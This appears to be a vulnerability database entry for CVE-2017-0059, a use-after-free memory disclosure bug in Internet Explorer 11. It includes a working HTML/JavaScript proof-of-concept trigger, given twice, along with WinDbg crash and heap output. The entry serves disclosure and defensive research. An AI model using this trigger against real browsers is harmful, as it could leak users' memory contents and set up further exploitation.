Microsoft IE: textarea.defaultValue memory disclosure (CVE-2017-0059)

2017-03-21T00:00:00
ID SSV:92806
Type seebug
Reporter fizz
Modified 2017-03-21T00:00:00

Description

There is an use-after-free bug in IE which can lead to info leak / memory disclosure.

The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)

PoC:

``` <!-- saved from url=(0014)about:internet --> <script>

function run() { var textarea = document.getElementById("textarea"); var frame = document.createElement("iframe");

textarea.appendChild(frame);

frame.contentDocument.onreadystatechange = eventhandler;

form.reset(); }

function eventhandler() { document.getElementById("textarea").defaultValue = "foo"; alert("Text value freed, can be reallocated here"); }

</script> <body onload=run()> <form id="form"> <textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea> ```

Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.

The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at

(b5c.f44): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000 eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 msvcrt!wcscpy_s+0x46: 7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=???? 0:008&gt; k # ChildEBP RetAddr 00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46 01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa 02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79 03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f 04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157 05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33 06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d 07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction&lt;1&gt;+0x91 08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10 09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49 0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8 0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk&lt;1&gt;+0x200 WARNING: Frame IP not in any known module. Following frames may be wrong. 0c 0a3ab5c0 706bda16 0x9780fd9 0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62 0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk&lt;1&gt;+0x200 0f 0a3ab990 706b6d73 0x9780fe1 10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction&lt;1&gt;+0x91 11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5 12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42 13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2 14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7 15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a 16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d 17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210 18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42 19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150 1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5 1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90 1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146 1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0 1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed 1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d 20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12 21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c 22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103 23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23 24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109 25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5 26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf 27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7 29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67 2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe 2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70 2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b where the old value was deleated at 0:008&gt; !heap -p -a 0e024ffc address 0e024ffc found in _DPH_HEAP_ROOT @ f1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) dd03820: e024000 2000 7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d 77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033 77b6de86 ntdll!RtlReAllocateHeap+0x00000054 71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215 71b8f48d MSHTML!MemoryProtection::HeapReAlloc&lt;0&gt;+0x00000026 71b8f446 MSHTML!_HeapRealloc&lt;0&gt;+0x00000011 7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546 71678877 MSHTML!CBase::put_StringHelper+0x0000004d 71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070 706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d 706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138 706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076 70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal&lt;0&gt;+0x00000341 70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040 70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d 706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e 706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk&lt;1&gt;+0x00000200 Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

                                        
                                            
                                                &lt;!-- saved from url=(0014)about:internet --&gt;
&lt;script&gt;

function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");

  textarea.appendChild(frame);

  frame.contentDocument.onreadystatechange = eventhandler;

  form.reset();
}

function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}

&lt;/script&gt;
&lt;body onload=run()&gt;
&lt;form id="form"&gt;
&lt;textarea id="textarea" cols="80"&gt;aaaaaaaaaaaaaaaaaaaaaaaa&lt;/textarea&gt;